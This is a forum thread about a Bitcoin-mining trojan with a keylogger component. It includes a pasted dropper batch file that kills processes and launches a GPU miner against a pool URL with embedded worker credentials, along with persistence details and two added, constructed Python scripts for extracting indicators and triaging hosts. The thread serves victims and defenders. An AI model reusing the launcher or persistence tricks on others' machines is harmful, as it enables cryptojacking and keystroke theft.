A new pest?

Hi,
On inspecting my task manager tonight I found catalyst.exe running. Thought this was strange as I've never owned an ATI card, always Nvidia. On further inspection I found phoenix.exe also running. So I traced that back to my HD in a folder called “folder1” and found this .bat file as well as other stuff.

REM kill any running copies before relaunching
taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
REM launch the miner: -u pool URL (worker:password@host:port), -k OpenCL kernel, then kernel options
c:\folder1\3\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0

It seems this phoenix is something called a “miner” program and has something to do with “bitcoins”. What I do understand from reading tonight is that something installed this stuff on my PC without asking me, and has been trying to use my graphics card to run programs to earn this “mlawson_miranda:miranda@eu.triplemining.com” real cash! Is this a new con or am I just behind the times ;D
and what, if anything, can be done to stop it. phoenix.exe isn't a virus.
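The .bat file in the post above is the most useful artifact in it: the taskkill lines name the processes the dropper expects to find, and the miner command line carries the pool host, port and worker account that the pool operator would need for an abuse report. The following is an added example (not from the original post) that pulls those indicators out of such a batch file. The batch text is re-typed from the post as a constructed sample; the parsing of `-u`/`-k` and `KEY=VALUE` options follows the command line shown in the thread and is this example's own assumption about the miner's syntax.

```python
"""Extract indicators from a miner-dropper batch file (added example)."""
from urllib.parse import urlsplit

# Constructed sample: the three lines pasted in the thread, re-typed here.
SAMPLE_BAT = """taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
c:\\folder1\\3\\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0
"""


def parse_miner_cmd(parts):
    """Break a miner launch line into pool/worker/kernel fields.

    Assumes the phoenix-style syntax seen in the thread: -u <pool URL with
    worker:password@host:port>, -k <kernel name>, then KEY=VALUE options.
    """
    info = {"binary": parts[0], "kernel": None, "pool_host": None,
            "pool_port": None, "worker": None, "worker_password": None,
            "options": {}}
    i = 1
    while i < len(parts):
        tok = parts[i]
        if tok == "-u" and i + 1 < len(parts):
            # The pool URL embeds the credentials; urlsplit separates them.
            u = urlsplit(parts[i + 1])
            info["pool_host"] = u.hostname
            info["pool_port"] = u.port
            info["worker"] = u.username
            info["worker_password"] = u.password
            i += 2
        elif tok == "-k" and i + 1 < len(parts):
            info["kernel"] = parts[i + 1]
            i += 2
        elif "=" in tok:
            key, value = tok.split("=", 1)
            info["options"][key] = value
            i += 1
        else:
            i += 1
    return info


def parse_batch(text):
    """Return the image names the script kills and every miner launch it contains."""
    killed = []
    miners = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd in ("taskkill", "taskkill.exe"):
            # /IM <image> names the process being killed; these are the
            # dropper's own components, so they double as indicators.
            for i, tok in enumerate(parts):
                if tok.upper() == "/IM" and i + 1 < len(parts):
                    killed.append(parts[i + 1])
        elif "-u" in parts:
            miners.append(parse_miner_cmd(parts))
    return {"killed": killed, "miners": miners}


if __name__ == "__main__":
    result = parse_batch(SAMPLE_BAT)
    print("processes killed by dropper:", ", ".join(result["killed"]))
    for m in result["miners"]:
        print(f"miner {m['binary']} -> pool {m['pool_host']}:{m['pool_port']} "
              f"worker {m['worker']} kernel {m['kernel']} options {m['options']}")
```

Run it against the real file rather than the sample by reading the .bat from disk and passing its text to `parse_batch`; the `pool_host`, `pool_port` and `worker` fields are what the pool operator needs to act on a report.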

Upload suspicious file(s) to www.virustotal and test with 40+ malware scanners.

Also run a quick scan with Malwarebytes: http://filehippo.com/download_malwarebytes_anti_malware/

If anything is found, you may post the result here.

More Bitcoin malware
http://arstechnica.com/tech-policy/news/2011/08/symantec-spots-malware-that-uses-your-gpu-to-mine-bitcoins.ars
http://www.wired.com/threatlevel/2011/06/bitcoin-malware/
http://blog.trendmicro.com/cybercriminals-have-their-eyes-set-on-bitcoin/

The problem is phoenix.exe itself isn't a virus; it's a legit program apparently called a “miner” that these people use to earn “bitcoins”. Normally these people run machines to harvest these “bitcoins”. The problem is that someone has come up with the idea of using other people's computers for this process. This program apparently likes to use a GPU rather than a CPU to do its work. It is not trying to damage the PC as a virus would; it's trying to use its resources to earn the specific person cash! In this case “miranda@eu.triplemining.com”, and yes, I have reported this there. Now I bought my graphics card so that I can play games, not to have half its resources and my power used to earn someone I don't know cash. The point is Avast doesn't detect these miners as viruses, and that's the problem. Avast allowed it to be installed and run. The way the program is now being used has changed. So should we be warned by virus checkers about this?

It is not trying to damage the PC as a virus would; it's trying to use its resources to earn the specific person cash! In this case "miranda@eu.triplemining.com", and yes, I have reported this there.
All malware today is about money... or spam, but that is also money.
Avast allowed it to be installed and run. The way the program is now being used has changed. So should we be warned by virus checkers about this?
Maybe Avast detects it as a PUP (Possible Unwanted Program)... turn on PUP scan, or upload it to VirusTotal and see.

Or send it to the Avast lab for analysis if you think it should be detected.

I have been having the exact same problem as the OP.

I took the Function3.exe file and ran it through www.virustotal as you had suggested.

2/42 detected it as a virus:

Antiy-AVL saw it as “Trojan/Win32.Chifrax.gen”
McAfee-GW-Edition saw it as “Heuristic.BehavesLike.Win32.Fake.K”

I would think that it should probably be included in your list of things to catch.

[Edit]
I figured I should share more information on what I’ve seen happen here.

I have seen a file that was trying to extract a bunch of stuff (in the form of a function.exe file) fail during extraction. This is what brought my attention to the matter.

I would see a CRC error on extraction to c:\folder1\3\

After seeing this, I would see a phoenix.exe file, along with several other files:

  • init.pv
  • BFIPatcher.pv
  • kernel.cl
  • phoenix.exe

This stuff is sitting in folders within a kernels folder appended to the directory mentioned in the CRC error.
So the stuff was being extracted to:

  • C:\folder1\3\kernels\phatk

I hope this is enough information to help you guys figure out what to do with this.

Just a quick note.

This little pest is much more than a BC miner.

There’s a keylogging component to it which will snag pretty much anything and everything. I’m not sure where it sends the data yet, but you can find any existing files in the following location:

C:\Users\<username>\AppData\Local\Temp\dclogs*

If anyone has more specific information it would be appreciated.

You’ll find it put startup entries into your system under “ATI .exe” (note the space), and it generates a Temp folder file called Catalyst.exe on login, which I presume starts the keylogging and transmission functionality.
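Taken together, the posts in this thread give a small, concrete indicator set: the process names (phoenix.exe, function3.exe, catalyst.exe), the drop directory C:\folder1\3 and its kernels\phatk subfolder, the dclogs* files and Catalyst.exe in the user's Temp folder, and a Run entry named “ATI .exe” with the space. The following is an added example (not posted by anyone in the thread) that checks a host against exactly those indicators. The snapshot layout, the `triage` function and the Windows-only collector are this example's own design; the collector assumes it is run as the affected user so that `%LOCALAPPDATA%` and HKCU point at the right profile. The sample snapshot is constructed to mirror what the posters described.

```python
"""Triage a Windows host for the indicators described in this thread (added example)."""
import fnmatch
import os
import subprocess
import sys

# Indicators as reported in the thread; all comparisons are case-insensitive,
# which matches how Windows treats file and process names.
SUSPECT_PROCESSES = {"phoenix.exe", "function3.exe", "catalyst.exe"}
SUSPECT_RUN_ENTRY = "ATI .exe"            # note the space before ".exe"
SUSPECT_DIRS = [r"C:\folder1\3", r"C:\folder1\3\kernels\phatk"]
SUSPECT_TEMP_GLOBS = ["dclogs*", "catalyst.exe"]   # matched in %LOCALAPPDATA%\Temp


def triage(snapshot):
    """Return (indicator_kind, detail) findings for a snapshot dict.

    Expected keys: 'processes' (image names), 'run_entries' (name -> command),
    'temp_files' (file names in %LOCALAPPDATA%\\Temp), 'dirs' (existing paths).
    """
    findings = []
    for name in snapshot.get("processes", []):
        if name.lower() in SUSPECT_PROCESSES:
            findings.append(("process", name))
    for name, cmd in snapshot.get("run_entries", {}).items():
        # Exact match, including the space, as reported in the thread.
        if name.lower() == SUSPECT_RUN_ENTRY.lower():
            findings.append(("run_entry", f"{name} -> {cmd}"))
    for fname in snapshot.get("temp_files", []):
        if any(fnmatch.fnmatch(fname.lower(), g) for g in SUSPECT_TEMP_GLOBS):
            findings.append(("temp_file", fname))
    suspect_dirs = {d.lower() for d in SUSPECT_DIRS}
    for d in snapshot.get("dirs", []):
        if d.lower() in suspect_dirs:
            findings.append(("directory", d))
    return findings


def collect_snapshot():
    """Gather the same fields from a live Windows host (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("collector is Windows-only; pass a snapshot dict to triage()")
    import csv, io, winreg
    out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"],
                         capture_output=True, text=True, check=True).stdout
    processes = [row[0] for row in csv.reader(io.StringIO(out)) if row]
    run_entries = {}
    for hive in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        with key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                run_entries[name] = value
                i += 1
    temp = os.path.join(os.environ["LOCALAPPDATA"], "Temp")
    temp_files = os.listdir(temp) if os.path.isdir(temp) else []
    dirs = [d for d in SUSPECT_DIRS if os.path.isdir(d)]
    return {"processes": processes, "run_entries": run_entries,
            "temp_files": temp_files, "dirs": dirs}


# Constructed sample mirroring the thread's reports (the legitimate-looking
# entry and the user name are made up for illustration).
SAMPLE_SNAPSHOT = {
    "processes": ["explorer.exe", "Catalyst.exe", "phoenix.exe", "svchost.exe"],
    "run_entries": {
        "ATI .exe": r"C:\Users\victim\AppData\Local\Temp\Catalyst.exe",
        "SomeLegitApp": r"C:\Program Files\SomeLegitApp\app.exe",
    },
    "temp_files": ["dclogs2011-09-14.txt", "Catalyst.exe", "~DF1234.tmp"],
    "dirs": [r"C:\folder1\3\kernels\phatk"],
}

if __name__ == "__main__":
    snap = collect_snapshot() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for kind, detail in triage(snap):
        print(f"{kind:10} {detail}")
```

On a Windows host the script collects a live snapshot; elsewhere it falls back to the constructed sample so the matching logic can be exercised. Because the Run-entry check is an exact match, an entry named "ATI.exe" without the space is not flagged; widen `SUSPECT_RUN_ENTRY` to a pattern if you want looser matching.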